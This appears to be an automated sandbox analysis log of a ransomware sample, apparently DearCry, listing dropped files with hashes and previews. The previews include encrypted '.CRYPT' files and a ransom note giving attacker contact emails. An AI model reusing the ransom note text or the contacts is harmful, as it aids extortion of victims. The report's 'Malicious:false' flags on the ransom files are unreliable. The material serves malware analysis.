                                                            Preview: DEARCRY!....K...Y...lI...$....K...<.!..}.i=J......#...Q.f.G.+..H1. ..Tx..+...G....!.....r@6.E.....d.E.&[v.......O.A.N?.c............../. .:7..D...H..f..e.v.J9.gK....Ar.,ih.?..N/k.,.Rn.3..."..M.8DD.t8S.. D...A.^.0..i.(gm.?....@T..._*.^..4....7d.N).M.................(....Y............K..uk_[...9l...o..8v9.3]..;........X....%...dL.....X..H0`.p.q..C].O...q...}I.1../..?i5.8.....!..y....&2EId..A..o:...C....\IX.U[LK....%I..^...7.s..DEARCRY!......._{3...,..h\c.J.u.....C.n.0..n.+.OcM.U..\\..0...y..O.. .>..h..=.{i....p]E....^.LA...].I....F...@.?J.[.S....%..k...\..:LA4..pc.....z]..|=.6B..hZ{H]..T.6...fS*...]_~h.Z$.R.r..4............g.6..x.C>.^=.k..p..Y..F.R1.r..K,.d.Y.........,s.3.....1...............s.wo-...-I......!Ov........L.....<8I........5^...4.D..Hj..V.n,@=2%@...x...H..6u...<.1......"..yPo.J..s.Yx....<..$.....d.b.#4.p'.X.#../#*......5Q....J......|....4.L.Vq.XDEARCRY!..........\8..Tz..b......Zv>. .q1b.*bB.j.W.OX_=XG.,"....... i.[..B..~..X.`.Z
                                                            C:\Users\Public\Desktop\readme.txt
                                                            Process:C:\Users\user\Desktop\bkscEXd86b.exe
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):2007
                                                            Entropy (8bit):4.7613637261579855
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:D20AFA4F2F4E9AF881EE2D1130AD4181
                                                            SHA1:2D5014E9ECBBE1A299F69FABB291FE11F75015CB
                                                            SHA-256:A7FE76D02FB5180745810E0C7F0BE9CA0879ECD4624A1A68FFF518C9B3E012BA
                                                            SHA-512:24EEDD4B85CDA7330D03BD69F2A2B125EBA2BEEE0C522EDEF6683CDBCDEB47FBA372EEF5C862536160FD91FE167F44119F78E3B2E01718FDB5FA4F7258E27A8A
                                                            Malicious:false
                                                            Preview: Your file has been encrypted!........ If you want to decrypt, please contact us......... konedieyp@airmail.cc or uenwonken@memail.com........ And please send me the following hash!........ d37fc1eabc6783a418d23a8d2ba5db5a..Your file has been encrypted!........ If you want to decrypt, please contact us......... konedieyp@airmail.cc or uenwonken@memail.com........ And please send me the following hash!........ d37fc1eabc6783a418d23a8d2ba5db5a..Your file has been encrypted!........ If you want to decrypt, please contact us......... konedieyp@airmail.cc or uenwonken@memail.com........ And please send me the following hash!........ d37fc1eabc6783a418d23a8d2ba5db5a..Your file has been encrypted!........ If you want to decrypt, please contact us......... konedieyp@airmail.cc or uenwonken@memail.com........ And please send me the following hash!........ d37fc1eabc6783a418d23a8d2ba5db5a..Your file has been encrypted!........ If you want to decrypt, please contact us......... konedieyp@airmail.c
                                                            C:\Users\Public\Documents\desktop.ini
                                                            Process:C:\Users\user\Desktop\bkscEXd86b.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):278
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:99A2CA325525DDFBAD6D84EA69A6B4B7
                                                            SHA1:3DA331758F501647C6065B5C1AD0F78FF3349D17
                                                            SHA-256:145B83928222884EBA630D21234FF5C2ACA2AB0206AEDA0B3D7C3D08188FBAC0
                                                            SHA-512:A75CFEAF6AC5269083A10462CD3AD4B44EBF46D9DC0C5E1D23FC9732F59EEED1E7C9E1168E2A24787B667E33BC15FA4B93105A62090D7A982BD94E9D6D512809
                                                            Malicious:false
                                                            Preview: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                            C:\Users\Public\Documents\desktop.ini.CRYPT
                                                            Process:C:\Users\user\Desktop\bkscEXd86b.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):568
                                                            Entropy (8bit):7.628706618185732
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:A2048E17D6CC5412AB8D01EEB1EE545F
                                                            SHA1:46ECE3453E2D99093F7F5535635C2FD14BF35B82
                                                            SHA-256:6D3376ED67E9367593F7B5A4F7A2A972B75B4947D9CDDFDB48A34162EC35B6E3
                                                            SHA-512:5947F8B7C4F4F83827D62EB8A88722805CB595A8E46D040A028393FBFE6BD71853B1F84EA8E8F6DD5E45E1B7CA34CE056C89417E594DB5427CFA971CCFB64739
                                                            Malicious:false
                                                            Preview: DEARCRY!.........x.s..Oj=>Rq...qK..."s..`..-:..Tp....1..s..Q..^.e..(^=.kd....;{.@.u.0..2.h..v.;.*.wGx.@*..j.H.R$.z....I'l..X....-E...f...<T.h.uf..C...,.Ku)...x.v.O.3y.k........7?...8}HUF....0.M.Sk.F...}.U.a.O...OS@.LD..A._...r6.#...%.)1...aY,....9.7................`.G..C.<....~/....C.)..H[.&}s?2Y.E.]r....7... ..(K...L.0B..H......U....15F....C........X^..P..9%.sp.....?.....I\y..WK_.#.. ..}.?.....n.J.O.....r;...G.qMY.WP.`8.8...r.H[....p...175`.3.#...3d$.eY_..y...`.c.....o.......<q...qd.Q..n..0.[b..H...c%../.....rF....<u......`Q...!1
                                                            C:\Users\Public\Music\desktop.ini
                                                            Process:C:\Users\user\Desktop\bkscEXd86b.exe
                                                            File Type:ASCII text, with very long lines, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):380
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:216F6E1CE2260194845F567B92900F22
                                                            SHA1:35BA03C2C4F32151D6B5AAA5429137638F0909EC
                                                            SHA-256:7A6EAA509C64E3229FE83EEBF52AB890F2977E08B7F88ACC44FC97F9F88D3F33
                                                            SHA-512:98E6869FC89E819FDF2F75CD843539303EB4E7366940869C107BA3B52B0DE377149F7B76407ACEF23865C5A043255720E783FF165C8D5A2C2E32BA6F101E7DFE
                                                            Malicious:false
                                                            Preview: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                            C:\Users\Public\Music\desktop.ini.CRYPT
                                                            Process:C:\Users\user\Desktop\bkscEXd86b.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):664
                                                            Entropy (8bit):7.600444263675093
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:20B47987F02930A742966147740A6076
                                                            SHA1:2C4B7E6C6C909DD838266A6EAB7C06CC0FD9AB30
                                                            SHA-256:C952C5CB7915708280A50220FD317CDCB939857DA530341A0A3BFCEEFEA014CA
                                                            SHA-512:2C2038F579F49DBBE7EADB3A785FE81FBDC5A06417C0346A87980C22A4E53772990C10F4C395AC4786F23A25F59EB237138F12CE78656A508F2767A55552F3F7
                                                            Malicious:false
                                                            Preview: DEARCRY!....a$m.4..F.T.58E..Y.Nb.c3.7.M.LW5z.Rddd ..<.*w..lCIZ5...k!...E.)_...e..2...d$C.......7..)"......V...%..m?...2.....R....19..MF...e.Y.u(..mR..0~... J).i...W..m.........r....;.....Hg.a..'...k...@.0....c...R.O<.....Y-.d-d.m.Wxz.[B.;......v...>.........|.......Wv[@....)...<.^!u".VQ.X.c..QE...c.. ,...ZJ.2.%).*..,....../.Q..4.u..L.0.V.=..w..M(t....vb......S...".......^."E.X..>8.D:....\`.(-..a.p%k....M..E.....Cm.y.q....9 ,Q.7..T8f.+.C.....0I.D.\"..!5.JH'.kZ..(!5....M[x......ak.#&YMW....=..}q.k....8./.M.=..j......u....J...Aqk.n.Bf.k.%..J.3.%}.<...Ll.A.`...a^..Pb..#."<(.}....%.#q....Rew.C.........2.B;......]..)......X..Sw...>
                                                            C:\Users\Public\Pictures\desktop.ini
                                                            Process:C:\Users\user\Desktop\bkscEXd86b.exe
                                                            File Type:ASCII text, with very long lines, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):2660
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:731D6C8FF02659464DA50A007B5C38D7
                                                            SHA1:6A3DE7A80BC786F0840E8B0A163FD893BF090017
                                                            SHA-256:6EF7EC6F69A78E0C2E409CD5D753A34D66920BE43E749B70CB6B738896EF2FBB
                                                            SHA-512:4E6B5F8E5621B679B372E5B2D15594DACAB368A87AD11E2E885350A5889207628D50E44EF1DD3B9018BA1B4762A77078B48411DA9474B7A45AC2CAB7F1214E9B
                                                            Malicious:false
                                                            Preview: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                            C:\Users\Public\Pictures\desktop.ini.CRYPT
                                                            Process:C:\Users\user\Desktop\bkscEXd86b.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):4648
                                                            Entropy (8bit):7.919765594640715
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:0CED082F1FB4EB8AFD730CB5782B69BA
                                                            SHA1:390D52E66D94A50730D754A7F00B4CDD4C97CCB1
                                                            SHA-256:7D0CED9EC084D92041583DBF4CFD628CFA654CC9B6800DA2921971282CDB9C3A
                                                            SHA-512:084F495E0BA60B44D836D984B2F300B554FB2BA16379E83ADC827FCEF332DE3F6017140FBEAD07B50C5E3E68855F544549050B7E1B7EF261A777ED6EC136903B
                                                            Malicious:false
                                                            Preview: DEARCRY!......)..A..C.d.i....{.-l;Sj'e.........E.mHdZ'Y..`....z6U.)Q....Vs...}P..f.<.....\R..S%.i.Fv.a3.0..8%{+.J .....o...Z4H|..q.....Q......%~$.`.O.o.....*.....t...W.V.f........=..v..C.]...j.......4.@cj"...J..rA...{....2L...0......[....>..../.<....."....|.........._.,|......)..)R...........cF..!.B.zq#..er.Af.b."=}..P...WZ..EJ.*4..D....G..."./7..J...|.],h..1.~.9*R.R....o....v..INi..v:..R.....ShJ7.AX.....|...N.j..p.nG.G...'..x"..Z".p..!8f.?.K.q.*..E.!.}`#.(...NW....y..j.W.._\...&..t.......cl...y....&..}.=.j.l&W.. ..|Wy.L.-....`<.[.&..Q.I=/.t........ ....>.T.m....nf........./.5..^...$....#W...H.>..]0.17.Un..r.Y6WFp;DEARCRY!..........U......M.v.9r.l.2.6...b...%1<wh.[.ElaE.z..J.".j.9.:.!-,.*R.#...P...b$.L{[.....@.8..Q....G...!g.]. \]m.H..t...U<.\A....4sEC..>...T.F:g...H..H...W..#...P.......f.))....jI.Kq...4.....Dl&...:..$.O.F..,,..].....HH...4.y..W3Q;.O...H+.....G......|.......u#.`.L.....[yH......._.h.cPH.G...VM>.s...+M[....v.4~>.O.
                                                            C:\Users\Public\Videos\desktop.ini
                                                            Process:C:\Users\user\Desktop\bkscEXd86b.exe
                                                            File Type:ASCII text, with very long lines, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):2660
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:731D6C8FF02659464DA50A007B5C38D7
                                                            SHA1:6A3DE7A80BC786F0840E8B0A163FD893BF090017
                                                            SHA-256:6EF7EC6F69A78E0C2E409CD5D753A34D66920BE43E749B70CB6B738896EF2FBB
                                                            SHA-512:4E6B5F8E5621B679B372E5B2D15594DACAB368A87AD11E2E885350A5889207628D50E44EF1DD3B9018BA1B4762A77078B48411DA9474B7A45AC2CAB7F1214E9B
                                                            Malicious:false
                                                            Preview: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                            C:\Users\Public\Videos\desktop.ini.CRYPT
                                                            Process:C:\Users\user\Desktop\bkscEXd86b.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):4648
                                                            Entropy (8bit):7.921984855592276
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:A012E6A35E2F177ED0A42D7E8FB4A003
                                                            SHA1:DA3AB9000EE1FDF99B14789F26CA6733BB5DBF2F
                                                            SHA-256:2F0C45D35B9310000C755EB3076AB4D31C0947ABA975F2897BA812C80628FCEF
                                                            SHA-512:A2E91D351CC39611A58FA7924071CE09EB7AE9F7E4836B137BB4B8FE107EB7DD8D7742997C4CCC3416697E191D94A752C8EB40C282AEED29237FEAAFAB784CF0
                                                            Malicious:false
                                                            Preview: DEARCRY!....L.....`x33f...V..b.._.6......sS.&.......'..cbU.Ul.....h`....d.?rF*..5..k.B/J...VwB.5..K..6.G.h....h.F..T."..........5X......f..X..e..p.p..a..Me.:...4.7.\...uQ`v"..)p.L.U.-.......ei.^.kU....>{5..z;3.j..9..3.......qZ.X.......>.DSe9&.u..a`...P.W..#......|.......HAt....ujy!...)..^...`...b.....E...?.}.....!...fK.<+.r........pY...M...}...."e.....3..Y......9?..k./2..:.c..hij..#fB..H..{.a....e'.V...5)....?...".A.9.....Yu7....9....@X.......l@e.l...1H.................J....+.t.iS.~(..i.q.....sG.Lv.RF.s.b...v.'........]h..s.l.mf.3..A....5.^..{.r|...M)...p...,9....[.#D.|0x..3......&@/o.r...RA..|Fn..b.."....w....@.+..i.p.B.<HX/>.m.DEARCRY!....(1...H.Qr...++)..&..J..I65..iaN.P..uG.8...:...W.........P.....'D+Ga;.r.Di..5..a. ....9*G[N.....Gd..m...*...l).p...x...'hm.6K5..dJ......Y."R..(.....`.G.1.....o?..p.}...|...s........,.J...#.\dT......+Rt...$.j4.EC...Qn.N.........h$4.......|.........".#.]...5..........T.I~.....h.XG..f.!...A......6K.|'
                                                            C:\Users\user\AppData\Local\Microsoft\GameDVR\KnownGameList.bin
                                                            Process:C:\Windows\explorer.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):418744
                                                            Entropy (8bit):3.4492632557651244
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:0CE3B2508EF5A7A9A61BF0B09BB6611B
                                                            SHA1:CACE545D6F7DE7739A61DDA8D40CBB107575E6DD
                                                            SHA-256:4DBBE5DE4337E77871B03C953326828D95E124E69C782E72DD0ED67E801FB508
                                                            SHA-512:C99F07FD5139D8D3F761A1F27B4D7AE10254E57649015A3AB20735AB5F605E4F0773B99AC41AA3F6F8B99FC5B59FFDAC982AF429F5E5D4388B79C526DD655ADE
                                                            Malicious:false
                                                            Preview: ........B.............................. ......................................g.a.m.e.b.a.r...e.x.e.......y...w..hA..:.....:.......<...g.a.m.e.p.a.n.e.l...e.x.e...y...w..hA..:.....:.......<.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................0.0.6...D...x...a.d.v.e..$..T...a.o.k. ..@..t...a.v.p....]......b.e.a.t..|..|...b.l.a.d.....@...b.u.b.s.H.......c.k.2.g.....d...c.o.n.t.`.......d.a.n.g.d.......d.e.c.k.p*.. ...d.i.s.t..H......d.r.i.v..e..T...e.g.g.n.........e.x.o.d.|...\...f.c.p.r........f.i.g.h.....,...f.o.r.t......)..g.a.
                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\NotifyIcon\Microsoft.Explorer.Notification.{F3021280-8B71-AE51-7BF9-DAA692344272}.png
                                                            Process:C:\Windows\explorer.exe
                                                            File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                            Category:dropped
                                                            Size (bytes):685
                                                            Entropy (8bit):7.574420459296215
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:089E722D4905CA6D6C817FED5EEB8C73
                                                            SHA1:DE72D2CD21E7CDC6ABFEB1DC60EFB79969E1379E
                                                            SHA-256:7595D019957F2A499B8A44CE33A4049D4021BB8799B4E3F6D5A8BAB9DBCDF589
                                                            SHA-512:E7E7709C963910B7BFC2ECBAA48D3F3177FEF5D45AA7A8B324860C899077DBC807895D5F75DD4AE96B55C3C37A6F9978D96A86C36ED5A3849B9E2B708FD2945F
                                                            Malicious:false
                                                            Preview: .PNG........IHDR................a....sRGB.........gAMA......a....WIDAT8O..Mk.Q...i... . .D.05....q.ML..PBi....~......T(..v..".. ]Y.-.M;....6.t.i23..f2.;C..F..n.s....{.._.t..........0j*..........t..I&.'....b<.....Ho.\..........J..@...dK8 K.....Y.).Ec3...!.....J.rT.[.a.....\O......B...CA.+...r....c....L...n...[e.[..=A.....2T.u]..........BVdh-m.q..w..`...z...M......A.su$.....X.Zo.D7.IU.....T:|....d..yhttt..g1..2}..X........3...~....J...<....._.xG...N.....J.''.. .eY..{...e.M.e.y97wvm..........v......l.V..\..(.e.q......(.(..`y.5.........V%..S.;..0q3~..|.\Z..\nrjjjR..H.P`sj.....A....g...l&..H$.V......<..}.X.Z.\q..wwv.x~'.q.V........4-..c.....IEND.B`.
                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\INetCache\72BKUTKD\BBDBvk5AokRBwrox4FNOb3dTd1E[1].css
                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                            File Type:ASCII text, with very long lines, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):7671
                                                            Entropy (8bit):5.15245035345059
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:A1F32F25C7C924B918EA54A86670D731
                                                            SHA1:F1BF7CB5ADDF0C4BCED58D661137A1F0ACD257C5
                                                            SHA-256:6B58339F9240E372FA046E985DA0D0C5A17B679F27FF3058D6EBD4CD515CA874
                                                            SHA-512:5ACEFCAB3062051BD538CCF57EBCBB0BC9FCF11C12768EC7559B2ADA84F871299CE2C93B2400807F362578AD2C0F31AFF5CFE925C2FB259A7FFD24CC498435ED
                                                            Malicious:false
                                                            Preview: body #fbpgdg{color:#000;font-family:'Segoe UI',Arial,Helvetica,Sans-Serif;font-style:normal;font-variant:normal;font-weight:normal;background-position:inherit;display:initial;cursor:pointer;line-height:15px}body{position:static}body[dir]{margin:0}#fbpgdg,#fbpgdg *{box-sizing:content-box}#fbpgdg h2{font-weight:bold;-webkit-margin-before:.83em;-webkit-margin-after:.83em;font-size:1.3em;line-height:15px}body[dir] #fbpgdg h2{margin:10px 0 10px 0}#fbpgdg h3{font-weight:bold;font-size:1.17em;display:block}#fbpgdg .fb-t-small{font-size:13px}#fbpgdg .fbctgcntsdk,#fbpgdg .container{-webkit-margin-after:0}body[dir] #fbpgdg .fbctgcntsdk,body[dir] #fbpgdg .container{margin-bottom:0;margin-top:10px}body[dir='ltr'] #fbpgdg .fbctgcntsdk,body[dir='ltr'] #fbpgdg .container{padding-left:0}body[dir='rtl'] #fbpgdg .fbctgcntsdk,body[dir='rtl'] #fbpgdg .container{padding-right:0}#fbpgdg .fbctgctlsdk{list-style:none;display:list-item}body[dir] #fbpgdg .fbctgctlsdk{margin:10px 0 10px 0}#fbpgdg a{text-decorati
                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\INetCache\72BKUTKD\BBDBvk5AokRBwrox4FNOb3dTd1E[2].css
                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                            File Type:empty
                                                            Category:dropped
                                                            Size (bytes):0
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:D41D8CD98F00B204E9800998ECF8427E
                                                            SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
                                                            SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
                                                            SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
                                                            Malicious:false
                                                            Preview:
                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\INetCache\72BKUTKD\I-iaeF2_hBWL-N4uY_JLxrlxDpc.br[1].js
                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                            File Type:empty
                                                            Category:dropped
                                                            Size (bytes):0
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:D41D8CD98F00B204E9800998ECF8427E
                                                            SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
                                                            SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
                                                            SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
                                                            Malicious:false
                                                            Preview:
                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\INetCache\72BKUTKD\JYoPtIKNhSsYx2yWTQ7wI2BbEs0[1].css
                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                            File Type:UTF-8 Unicode text, with very long lines, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):78428
                                                            Entropy (8bit):5.207062449369692
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:0F2E1FF4FF81897D2B8968E9DB364C4F
                                                            SHA1:B51C7452A54337FD0B34027191A71601865C8F30
                                                            SHA-256:98A24DB270D4652C4F1D3BA59C1F527ED8EF1E43B51389DCE13D63E011F42049
                                                            SHA-512:2003138D3774FED208A8878DA24564A05798887A1164F314655A040F1A61D934BF4D6BF4E7B1A140398FFCDDE8679D9E90139A4D2C98FD9856E04865179B3F8C
                                                            Malicious:false
                                                            Preview: .rewardsBadge,.wideByDefault .scopesList .scopeTile:not(.selectedScope){color:rgba(0,0,0,.6)}.wideByDefault .scopesList .scopeTile:not(.selectedScope):hover{color:#000}.filterIcon:focus{height:48px;width:46px}body[dir] .filterIcon:focus{margin-top:2px}body[dir='ltr'] .filterIcon:focus{margin-right:2px}body[dir='rtl'] .filterIcon:focus{margin-left:2px}.searchScopes .scopeTile{cursor:default;position:relative;align-items:center}.searchScopes a:hover{background-color:rgba(0,0,0,.1)}.scopesList{height:52px;border-bottom:1px solid rgba(0,0,0,.1);display:flex}.scopesList .scopeTile:focus{height:48px}body[dir] .scopesList .scopeTile:focus{padding:0 14px;margin:2px 2px 0}.scopesList .scopeTile,.scopesList .scopeTile:active{height:51px;display:flex}body[dir] .scopesList .scopeTile,body[dir] .scopesList .scopeTile:active{padding:0 16px;margin:0}.scopesList .scopeTile.selectedScope:focus{height:48px}.scopesList .scopeTile.selectedScope,.scopesList .scopeTile.selectedScope:active{height:52px}.scop
                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\INetCache\72BKUTKD\JYoPtIKNhSsYx2yWTQ7wI2BbEs0[2].css
                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                            File Type:empty
                                                            Category:dropped
                                                            Size (bytes):0
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:D41D8CD98F00B204E9800998ECF8427E
                                                            SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
                                                            SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
                                                            SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
                                                            Malicious:false
                                                            Preview:
                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\INetCache\72BKUTKD\QNBBNqWD9F_Blep-UqQSqnMp-FI[1].css
                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):6
                                                            Entropy (8bit):2.584962500721156
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:77373397A17BD1987DFCA2E68D022ECF
                                                            SHA1:1294758879506EFF3A54AAC8D2B59DF17B831978
                                                            SHA-256:A319AF2E953E7AFDA681B85A62F629A5C37344AF47D2FCD23AB45E1D99497F13
                                                            SHA-512:A177F5C25182C62211891786A8F78B2A1CAEC078C512FC39600809C22B41477C1E8B7A3CF90C88BBBE6869EA5411DD1343CAD9A23C6CE1502C439A6D1779EA1B
                                                            Malicious:false
                                                            Preview: z{a:1}
                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\INetCache\72BKUTKD\QNBBNqWD9F_Blep-UqQSqnMp-FI[2].css
                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                            File Type:empty
                                                            Category:dropped
                                                            Size (bytes):0
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:D41D8CD98F00B204E9800998ECF8427E
